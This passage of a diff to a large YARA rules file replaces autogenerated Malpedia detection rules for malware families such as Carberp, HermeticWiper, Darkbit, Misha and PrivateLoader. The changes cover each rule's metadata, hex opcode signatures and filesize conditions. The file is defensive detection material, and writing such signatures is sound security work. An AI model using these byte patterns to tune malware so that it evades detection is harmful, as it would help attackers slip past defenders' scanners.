+		$sequence_5 = { 6a00 52 57 50 ff5624 8bf8 85ff }
+		$sequence_6 = { 83c410 8b45ec 8d4e24 50 53 }
+		$sequence_7 = { c744242044764a00 8d4c2420 6a01 8d542444 51 52 8bce }
+		$sequence_8 = { 5b 0f94c0 81c480010000 c3 5f 5e 33c0 }
+		$sequence_9 = { 7409 53 e8???????? 83c404 68010100a0 6a00 }
 
 	condition:
-		7 of them and filesize < 331776
+		7 of them and filesize < 2031616
 }
-rule MALPEDIA_Win_Carberp_Auto : FILE
+rule MALPEDIA_Win_Hermeticwiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6dabcbc-eb1a-5db4-81e2-886d378b4be1"
+		id = "26ab54c0-79a4-58b9-ba8b-0324b07af9f4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carberp_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermeticwiper_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "86e4e7a3a500c58000a297ef120e6eaa02ce211014fb7c016ba6df2b3118cc01"
+		logic_hash = "0d202d4a6b1fd92490b3e5fc04dc1683d573bc3458e17749b676604435662c74"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139900,34 +139615,34 @@ rule MALPEDIA_Win_Carberp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff750c 33db ff35???????? e8???????? 8bf0 59 59 }
-		$sequence_1 = { 7416 80f92f 7411 80f93d 740c 3bc6 7e04 }
-		$sequence_2 = { 7415 3bcb 7611 83fa1f 730c 884415d4 42 }
-		$sequence_3 = { 8d0409 83f80a 89442410 7e08 c74424100a000000 3b6c243c 0f8cf5fdffff }
-		$sequence_4 = { ff7514 e8???????? 8bf0 59 85f6 7416 ff7514 }
-		$sequence_5 = { 68???????? 50 68???????? 6a03 e8???????? 83c410 8906 }
-		$sequence_6 = { e8???????? 59 5e c3 6a00 56 e8???????? }
-		$sequence_7 = { ff731c 6a09 680b110000 ff35???????? e8???????? 83c410 85c0 }
-		$sequence_8 = { ff742410 ff742410 ff742410 ff742410 ffd0 c3 56 }
-		$sequence_9 = { 817e0402020000 0f85c1000000 6af4 ff36 e8???????? 59 59 }
+		$sequence_0 = { 83d1ff 894dbc 03ff 83cf01 ebe7 8b75d4 }
+		$sequence_1 = { 68???????? eb2f ff15???????? 3d7e040000 0f8522040000 837df800 }
+		$sequence_2 = { 0f86fe000000 8b55d0 8d4630 8945f8 6690 8b00 85c0 }
+		$sequence_3 = { 53 51 51 52 b980000000 e8???????? 8b4c2428 }
+		$sequence_4 = { 8845fb 84e4 0f856dfeffff 5f 5e 5b 8be5 }
+		$sequence_5 = { 8b4e10 8b7e08 03cf 8b560c 8b4614 13c2 89542418 }
+		$sequence_6 = { 83ee02 eb02 8bf3 397df0 7531 6a5c 6a00 }
+		$sequence_7 = { 8b401c 83c118 03c1 8b4c2414 89442424 3bf0 736e }
+		$sequence_8 = { 57 56 ff15???????? 85c0 752a ff15???????? 33ff }
+		$sequence_9 = { 5e b801000000 5b 8be5 5d c20c00 8b7510 }
 
 	condition:
-		7 of them and filesize < 491520
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Spedear_Auto : FILE
+rule MALPEDIA_Win_Darkbit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1d005a15-ef8d-569f-a767-c6e1e72829d4"
+		id = "376307d8-f183-5168-b430-3c79d528468e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spedear_auto.yar#L1-L271"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkbit_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fdde63af58dfc9054af7189054546d8fc5a45deaed146cfe4323b2ae3cb67aa8"
+		logic_hash = "3345b8391d558255e8d42c00573b9e9bb419b0424b0535da1de4bc7f3c804298"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -139939,50 +139654,32 @@ rule MALPEDIA_Win_Spedear_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e207 03c2 c1f803 83c40c 85c0 }
-		$sequence_1 = { 53 50 e8???????? 8b7e0c 895e10 }
-		$sequence_2 = { 8b4718 8a5f06 50 894608 e8???????? }
-		$sequence_3 = { 6a00 6a00 57 8bd8 ffd6 6a00 8d442414 }
-		$sequence_4 = { 894618 ffd7 89461c 5f }
-		$sequence_5 = { e8???????? 83c404 3bc5 740a c700???????? 8bd8 eb02 }
-		$sequence_6 = { 8906 8b44241c 5e 33d1 5d }
-		$sequence_7 = { 8b4604 8b571c 83c410 83c120 53 e8???????? 3bdd }
-		$sequence_8 = { 85c0 7536 85f6 742c 833e00 741e 8b5608 }
-		$sequence_9 = { 6a00 68???????? e8???????? 83c40c 68d0070000 }
-		$sequence_10 = { 741a 6a00 6a00 ff7608 ff5604 6800800000 6a00 }
-		$sequence_11 = { 394878 7456 39487c 7451 }
-		$sequence_12 = { 8bc7 5e 5f 5b 5d c3 6a08 }
-		$sequence_13 = { 83450c04 33c7 ff4d08 8b7dfc }
-		$sequence_14 = { c745fc12000000 33ff 895d08 8b5d0c 0fb61c19 c1e708 }
-		$sequence_15 = { 4c8bda 418b10 498d6b44 498bd9 498bf8 }
-		$sequence_16 = { 8b4610 3998a0000000 760f 3998a4000000 7607 57 56 }
-		$sequence_17 = { 3b0d???????? 7329 4863d1 488d0dd0ab0000 }
-		$sequence_18 = { ff15???????? 4c8d5c2440 488d1571020100 492bd3 410fb60b 410fb60413 }
-		$sequence_19 = { c744243004010000 e8???????? 488b4c2438 4c8d5c2430 488d842450010000 488d15f0bd0000 4c895c2428 }
-		$sequence_20 = { 8d6a12 41be04000000 4d2be3 0f1f00 448bc2 }
-		$sequence_21 = { 68???????? 8d45f0 50 c745f0f0d12300 e8???????? }
-		$sequence_22 = { 488bcb e8???????? 85ff 7e33 }
-		$sequence_23 = { 8b4310 33c9 56 57 394878 }
-		$sequence_24 = { 895f10 488b4f18 4885c9 740c e8???????? }
-		$sequence_25 = { 3bf2 7cc1 034004 8b4804 }
-		$sequence_26 = { 4883c308 483bdf 72ed 48833d????????00 741f 488d0dc6ef0000 e8???????? }
-		$sequence_27 = { 85c0 752c ff7508 68???????? }
+		$sequence_0 = { e8???????? 488b8c2480050000 48894808 833d????????00 7515 488b8c24b0210000 488908 }
+		$sequence_1 = { 488d0505c50f00 4889d9 4889fb 4889f7 4c89c6 e8???????? 488b542450 }
+		$sequence_2 = { eb1a 440fb64c341e 418d1411 8d5293 88543c1e 448844341e 4883c002 }
+		$sequence_3 = { 4c8d4301 4c39c6 7331 488d05052b1700 4889d9 4889fb 4889f7 }
+		$sequence_4 = { eb1c 4889c7 488b8c24d0200000 e8???????? 488d3d4f2a2200 e8???????? 6690 }
+		$sequence_5 = { e8???????? 4889842460100000 48899c2400010000 488b842480000000 48c7c3ffffffff e8???????? 48899c2480140000 }
+		$sequence_6 = { e8???????? 488d0546a23800 bb26000000 e8???????? 90 4889442408 48895c2410 }
+		$sequence_7 = { e8???????? 48898424581c0000 48895c2428 488b0d???????? 48898c24980e0000 488d0547db0700 e8???????? }
+		$sequence_8 = { 488b8c24a8060000 48894808 833d????????00 7514 488b8c24d8220000 488908 488905???????? }
+		$sequence_9 = { 4d89d3 49c1ea2a 4983fa40 0f83d6060000 4c8d25576e5200 4f8b14d4 418402 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 11612160
 }
-rule MALPEDIA_Win_Zardoor_Auto : FILE
+rule MALPEDIA_Win_Misha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50308ee9-1428-5d6c-b40d-321fe9c765a2"
+		id = "7ba08020-4181-5ded-9bc0-49b98b3d2547"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zardoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zardoor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.misha_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "491b0a08b4b203499d0503a262d51ee8a6400f1ce6bac152bdcd0f18d092424e"
+		logic_hash = "55176526d6c66aba41e971557ded1fe9cdb654b2ecbb0584caf24e3a0c3f703a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139996,32 +139693,32 @@ rule MALPEDIA_Win_Zardoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740d c7442428ac070000 e9???????? f687d005000080 8b442468 410f44c1 81fa03030000 }
-		$sequence_1 = { f6c210 752c eb0a f6c220 7405 4584c0 7920 }
-		$sequence_2 = { e8???????? 4889442448 4885c0 0f85c9000000 c74424201d010000 4c8d0d264f0b00 8d5566 }
-		$sequence_3 = { ffc3 895c2430 e8???????? 3bd8 0f8c2cfeffff b801000000 488b9c2488000000 }
-		$sequence_4 = { 488d1572b10900 488bcd e8???????? 85c0 0f8e29020000 488b13 4885d2 }
-		$sequence_5 = { e8???????? 4883c9ff 660f1f440000 48ffc1 803c0800 75f7 83c10d }
-		$sequence_6 = { e8???????? 488906 4885c0 0f85ab000000 83c8ff 488b742458 488b5c2460 }
-		$sequence_7 = { e8???????? 4885c0 8bde 0f95c3 e8???????? 85db 488b9c2440010000 }
-		$sequence_8 = { 8bc3 448bcb 488bf9 448bc3 488bcb 4883f838 7317 }
-		$sequence_9 = { e8???????? 85c0 0f84d1000000 4d8b8d90000000 488bd3 4c8b442440 488bcb }
+		$sequence_0 = { 0d19000200 50 8b4318 0508010000 50 }
+		$sequence_1 = { 6a08 59 8bc3 c1e310 0bc3 6a18 8bfa }
+		$sequence_2 = { ff75c8 8b4314 83c070 50 8b8578ffffff 48 48 }
+		$sequence_3 = { 50 8b4314 05d8000000 50 ff75ec 8b7308 }
+		$sequence_4 = { 50 8b4318 0508020000 50 ff730c e8???????? }
+		$sequence_5 = { 8945e8 8b4510 8b00 8945e4 8d45fc }
+		$sequence_6 = { c78550feffff18181818 c78554feffff18181818 c78558feffff18181819 c7855cfeffff19191919 c78560feffff19191919 c78564feffff19191919 c78568feffff19191919 }
+		$sequence_7 = { 6a00 e8???????? 83c40c 8b45f4 8a4d0c 884818 8b45f4 }
+		$sequence_8 = { 8d85f8f9ffff 50 8d85e0f9ffff e8???????? 83c40c 0fb6c0 }
+		$sequence_9 = { 8d8568ffffff 50 6a01 6a02 8b4314 83c008 50 }
 
 	condition:
-		7 of them and filesize < 4376576
+		7 of them and filesize < 710656
 }
-rule MALPEDIA_Win_Chthonic_Auto : FILE
+rule MALPEDIA_Win_Mechanical_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9308f91d-3793-554b-b1d0-64ba8302fadb"
+		id = "f673020e-2414-508c-b896-8bd1153a2a5f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chthonic_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mechanical_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "4dc2485521a827af3e062f4f45b00520b596cc6d1b868ae843ff411ddfc73052"
+		logic_hash = "bdb95de618c80d698fcb0c6f336b0430b26a5d0b33d6a5403bc772ebe314b16e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140035,32 +139732,38 @@ rule MALPEDIA_Win_Chthonic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcf d3ee 83e601 eb00 8b4df8 }
-		$sequence_1 = { 0f850d010000 8b4df0 eb00 894df8 }
-		$sequence_2 = { 8a08 32ca 80e17f 8808 b001 c3 8b442404 }
-		$sequence_3 = { 74cf 8345fc02 b9000d0000 3b4df8 1bc9 f7d9 014dfc }
-		$sequence_4 = { 894df0 e9???????? 8b4514 8b4df4 8908 33c0 3b550c }
-		$sequence_5 = { 5f c1ee1f e9???????? 8b041a 6a1f 8bf0 }
-		$sequence_6 = { 80e17f 8808 b001 c3 8b442404 }
-		$sequence_7 = { e9???????? 8b041a 6a1f 8bf0 83c204 5f }
-		$sequence_8 = { 7cf4 33f6 33d2 8bc6 f77514 8b4510 8d8cb5fcfbffff }
-		$sequence_9 = { 3b550c 5f 5e 0f94c0 5b c9 c3 }
+		$sequence_0 = { 03c7 3bca 72ed 5f }
+		$sequence_1 = { 4883c201 4983e901 0f855dfeffff 488d9424000a0000 }
+		$sequence_2 = { 030495c0e54200 eb05 b8???????? f6400420 }
+		$sequence_3 = { 4883ec28 488d15056a0200 e8???????? 4885c0 }
+		$sequence_4 = { 0f84e4e30000 488b8500730200 488d8c2410600000 33d2 488901 8b8508730200 41b8f5000000 }
+		$sequence_5 = { 0401 3cbe 8844240b 76e2 }
+		$sequence_6 = { 033485c0e54200 8b45e4 8b00 8906 }
+		$sequence_7 = { 03ce c6840c3801000000 8d8424a05c0000 33f6 }
+		$sequence_8 = { 488bf3 48c1fe05 4c8d2547e50000 408afb 83e71f 48c1e706 }
+		$sequence_9 = { 00686c 42 0023 d18a0688078a }
+		$sequence_10 = { 03c1 1bc9 0bc1 59 e9???????? e8???????? ff742404 }
+		$sequence_11 = { 4585c0 0f84b6010000 488d9424f05d0000 458bc8 66666690 66666690 0fb602 }
+		$sequence_12 = { 033485c0e54200 c745e401000000 33db 395e08 }
+		$sequence_13 = { 0fb785107a0200 66894108 0fb685127a0200 88410a 488d8c248b010000 }
+		$sequence_14 = { 33d2 41b803010000 4488a42460430000 488905???????? e8???????? 4c8d1de50a0200 498bcc }
+		$sequence_15 = { 4489642430 4488a424100b0000 e8???????? 4c8d1dfcd60100 }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Sasfis_Auto : FILE
+rule MALPEDIA_Win_Lightlesscan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "faa37fe5-b8ae-5b3d-8761-9ca44fa700a7"
+		id = "b826b58a-58c7-58d3-8203-4697848cdc57"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sasfis_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightlesscan_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "cf32d2a1a7d6bbcae913d88ae0d2c6c9327ff9b8dad43d2e492ba8c00cbedd6a"
+		logic_hash = "5d3e853bb474af272be8c5d451244aad6d1bade1283c3318141a0ba65106022e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140074,32 +139777,32 @@ rule MALPEDIA_Win_Sasfis_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 241c 2c05 006188 c526 3503007ca3 ef 2b30 }
-		$sequence_1 = { 0bb2ea7632d3 728b 896b90 35d0797819 d581 }
-		$sequence_2 = { 880c24 8d642450 e9???????? 60 }
-		$sequence_3 = { 8f44241c f9 66ffc7 0fbdfa 80fe07 87742418 660fbafe06 }
-		$sequence_4 = { 036e20 43 7465 47 }
-		$sequence_5 = { 2030 51 090a 4d 1321 }
-		$sequence_6 = { 66893c24 89442434 9c 660fbef8 9c 89542438 68d58c61ca }
-		$sequence_7 = { 660fbec2 660fb6c0 8b4500 e8???????? 661584f0 fec0 27 }
-		$sequence_8 = { 7aae 2931 55 3cf4 b729 0300 47 }
-		$sequence_9 = { 9c 8f442440 8d3cfd9c379c8f 66ffcf }
+		$sequence_0 = { 83fb02 0f8539020000 33c0 4585ed 0f84bb010000 448b442464 488945b0 }
+		$sequence_1 = { 4885db 745a 488d0dda770400 e8???????? 4c8d4c2450 458bc4 488bd6 }
+		$sequence_2 = { 4c8d4c2478 4533c0 418d5001 488b4d28 ffd0 }
+		$sequence_3 = { 8b442434 eb8c 85c0 0f858c060000 33db 4d8be7 8bfb }
+		$sequence_4 = { e8???????? 488d4c2454 4c89642428 48894c2420 488b4c2458 4533c9 4533c0 }
+		$sequence_5 = { b904010000 498bc3 66443938 740b 4883c002 48ffc9 75f1 }
+		$sequence_6 = { 4883c9ff 48897c2430 33c0 488bfb 488bd6 f2ae 48f7d1 }
+		$sequence_7 = { e8???????? 488bcb ffd0 488b0d???????? 488b1d???????? c60107 40382b }
+		$sequence_8 = { 4c8d8de0030000 4c8d05306f0500 440fb7d8 488d8dd0010000 ba04010000 44895c2420 e8???????? }
+		$sequence_9 = { 498be3 415c 5f 5d c3 48895c2418 48896c2420 }
 
 	condition:
-		7 of them and filesize < 8060928
+		7 of them and filesize < 1399808
 }
-rule MALPEDIA_Win_Acridrain_Auto : FILE
+rule MALPEDIA_Win_Mydogs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef433885-2f79-5863-bbed-81d7d31ae677"
+		id = "4b817b5f-5d7c-595b-8c97-271eb59c1e4c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acridrain_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mydogs_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "be1111fbfc299034daf1631180c40c75225491471e67ad1cf19bc33316287e9b"
+		logic_hash = "fb82bf24d6c6bbbb3b47474367cfbe1a36e1fd31146eb3759ae00c840dc8a44d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140113,32 +139816,32 @@ rule MALPEDIA_Win_Acridrain_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff8ea0000000 8bf8 897df0 83ff64 741e 83bb8400000000 7c15 }
-		$sequence_1 = { ff7048 e8???????? 83c404 85f6 0f85c4000000 8b4dec 8bc7 }
-		$sequence_2 = { f6401604 57 8b7a38 7414 8b45f0 51 03c7 }
-		$sequence_3 = { f20f5945d4 f20f5905???????? e9???????? 81fe56010000 7c2a 8bcf e8???????? }
-		$sequence_4 = { e8???????? 33c9 0fb6db 83c408 84c0 0f45d9 895c2414 }
-		$sequence_5 = { 8b4e08 3bcb 740d 40 83c654 3bc2 72f1 }
-		$sequence_6 = { ff7548 68???????? 55 e8???????? 83c40c 85c0 0f85b8010000 }
-		$sequence_7 = { 8b7d08 8b472c 85c0 0f84a6000000 53 8b5d0c 56 }
-		$sequence_8 = { ff75f4 ff750c 57 e8???????? 83c418 85c0 0f84b3feffff }
-		$sequence_9 = { e8???????? ff75cc 57 53 e8???????? 8b55b8 52 }
+		$sequence_0 = { 88040a 8d4901 84c0 75f4 6808020000 e8???????? }
+		$sequence_1 = { 2bca 51 8d85e8fcffff 50 6a01 6a00 53 }
+		$sequence_2 = { 50 8b8544f8ffff 33c9 038d48f8ffff 83d000 50 0fb78582f9ffff }
+		$sequence_3 = { 83fe20 750f 57 6a01 6a01 68???????? e9???????? }
+		$sequence_4 = { 61 9d a1???????? f30f7e05???????? }
+		$sequence_5 = { 33d2 8945d8 b901000000 8930 }
+		$sequence_6 = { e8???????? 0fb64608 88450b 6a01 8d450b 50 8bcf }
+		$sequence_7 = { 6860ea0000 ff15???????? 68???????? 6a00 68???????? 68???????? }
+		$sequence_8 = { 69c005840808 40 894704 898560fbffff c1e818 33c6 25ff000000 }
+		$sequence_9 = { c785f0eeffff00000000 e8???????? 8bf8 83c408 85ff }
 
 	condition:
-		7 of them and filesize < 2244608
+		7 of them and filesize < 313344
 }
-rule MALPEDIA_Win_Nightclub_Auto : FILE
+rule MALPEDIA_Win_Stowaway_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25a4cb0b-5988-50b4-b9d7-c4130dae5827"
+		id = "fff7cfff-aed4-5ea2-8664-de07b4f99127"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightclub_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stowaway_auto.yar#L1-L199"
 		license_url = "N/A"
-		logic_hash = "15f8ebb368b37ab60005cfeccfb61f1f120d9d4f8ce48162386ff7677923e6da"
+		logic_hash = "84a539e785b0d71993d13deb34a2d8f732a0d59ec389deb587ebb307e97415d7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140152,32 +139855,42 @@ rule MALPEDIA_Win_Nightclub_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d45f4 64a300000000 8b4508 8d75d4 c745ec00000000 e8???????? }
-		$sequence_1 = { 889d5ffeffff ff15???????? 8d855efeffff c645fc05 50 }
-		$sequence_2 = { c645fc0c ff15???????? 85c0 0f8827010000 8b0d???????? 8b11 52 }
-		$sequence_3 = { 83c404 85c9 7517 33c0 8b450c 8d0442 5f }
-		$sequence_4 = { 8bff 8d45d4 8bcf e8???????? 50 c745fc01000000 8b4e08 }
-		$sequence_5 = { ff15???????? 83c610 3bf7 75f1 8b4304 50 ff15???????? }
-		$sequence_6 = { 83f806 7753 0fb69058720010 ff249550720010 ba???????? 8bc7 8d742430 }
-		$sequence_7 = { eb03 8945fc a1???????? 8b08 51 6a00 8d4e74 }
-		$sequence_8 = { 834dec01 85c0 7505 a1???????? 8bf0 8d4900 }
-		$sequence_9 = { 72e6 b892010000 5f 5e 8b4df8 33cd e8???????? }
+		$sequence_0 = { 76e8 77e8 78e8 79e8 }
+		$sequence_1 = { 78e8 79e8 7ae8 ce f67be8 }
+		$sequence_2 = { ce f67be8 7ce8 7de8 }
+		$sequence_3 = { a3???????? 4e fb b501 }
+		$sequence_4 = { 751e 53 2661 6d b040 3d1db5094f }
+		$sequence_5 = { 2a37 e394 5e b5a9 0e 2cc6 ec }
+		$sequence_6 = { 5b 6b5e045f aa 43 9a7f6eb1f75c72 7f30 fa }
+		$sequence_7 = { 50 91 3e06 48 52 2692 4e }
+		$sequence_8 = { 1b7f1c b567 8110932238ba 81f82f2437b0 645b f257 326640 }
+		$sequence_9 = { d4ff 57 ed 7a80 51 80534080 }
+		$sequence_10 = { 99 0039 801002 3900 99 }
+		$sequence_11 = { e774 5b 004f49 5c }
+		$sequence_12 = { 8d843000a03b00 01f3 50 83c708 }
+		$sequence_13 = { 777c 7781 7782 7783 7786 7787 }
+		$sequence_14 = { 3c77 0c35 f20b18 40 }
+		$sequence_15 = { f3676d 51 99 9f 4b 8099543c7bbf7a }
+		$sequence_16 = { a5 ed 91 34cf }
+		$sequence_17 = { 60 41 69e038173794 6c 5c d10f }
+		$sequence_18 = { d7 80cf73 c9 f0f3f9 }
+		$sequence_19 = { a4 49 07 04bc 3c2f }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 8003584
 }
-rule MALPEDIA_Win_Goggles_Auto : FILE
+rule MALPEDIA_Win_Privateloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "040bb693-a4be-548d-a501-6f2900be4db7"
+		id = "f74899e2-5f0f-5412-9628-abf5d89b0b25"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.goggles_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.privateloader_auto.yar#L1-L180"
 		license_url = "N/A"
-		logic_hash = "2057c3d81d740df16e7462115b1eb3ac99d3eec33754199313bf18b2c821d705"
+		logic_hash = "6d2070cfc4fc90b89a113279c1da7a1229970780c46dc9914cb804e46d0ce9c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140191,32 +139904,41 @@ rule MALPEDIA_Win_Goggles_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 8d842488010000 6a00 50 ff15???????? }
-		$sequence_1 = { 52 68???????? ff15???????? 8a542b01 }
-		$sequence_2 = { 68???????? e8???????? 83c410 c680a841001000 8d842410010000 }
-		$sequence_3 = { 8a8010400010 88441efe 8a4c2fff 83e13f 4a 8a8110400010 88441eff }
-		$sequence_4 = { 0f8559ffffff 8b442414 83f803 756e 0fbe0437 }
-		$sequence_5 = { 33f6 894c240c 85c9 7e6f 8b4c2418 8bc2 2bc1 }
-		$sequence_6 = { 0fbe043e 50 68???????? ff15???????? b9???????? 2ac1 c0e002 }
-		$sequence_7 = { 55 57 88442410 b940000000 33c0 8d7c2411 }
-		$sequence_8 = { 8a4c2ffe c1f806 83e10f 83e003 c1e102 0bc1 8a8010400010 }
-		$sequence_9 = { 0fbe8288410010 50 68???????? ff15???????? }
+		$sequence_0 = { 8bec 83ec1c 894df8 8b45f8 8b4810 894df4 }
+		$sequence_1 = { 8945f4 8b4dfc 83791408 7209 }
+		$sequence_2 = { 8b55e4 8a45ff 88040a 8b45f8 }
+		$sequence_3 = { 8b4d08 3b4814 776d 8b55f8 8955f4 8b45f4 8945ec }
+		$sequence_4 = { 8b45d8 8b4ddc 8b55d0 8b75d4 }
+		$sequence_5 = { 8b4508 8945e4 8b4de8 034de4 8a55ff }
+		$sequence_6 = { 8945c8 8955cc 8b45c8 8b55cc 5e }
+		$sequence_7 = { 8b55f8 8b45f4 3b4214 736c }
+		$sequence_8 = { e8???????? 33d2 b93f000000 f7f1 }
+		$sequence_9 = { 8b4590 8b4d94 8b5588 8b758c }
+		$sequence_10 = { a3???????? 33c0 5e c3 3b0d???????? }
+		$sequence_11 = { e8???????? 83c610 83c002 83ef08 }
+		$sequence_12 = { 81ec68010000 a1???????? 33c5 8945fc 56 57 }
+		$sequence_13 = { 83c201 8955e0 83d600 8975e4 }
+		$sequence_14 = { 8b4de0 8b45e4 50 51 52 56 e8???????? }
+		$sequence_15 = { 6a04 8d4310 50 6a06 }
+		$sequence_16 = { 0bc8 56 57 7529 }
+		$sequence_17 = { 8b8578ffffff 8b8d7cffffff 8b9570ffffff 8bb574ffffff }
+		$sequence_18 = { 03d0 8b4d9c 13f1 83c201 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 3670016
 }
-rule MALPEDIA_Win_Edam_Auto : FILE
+rule MALPEDIA_Win_Adylkuzz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f4028c21-33b6-5e9f-a37a-2699bc732d08"
+		id = "4eb10972-cae7-59fc-a870-eebdff70e8df"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.edam"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.edam_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz"
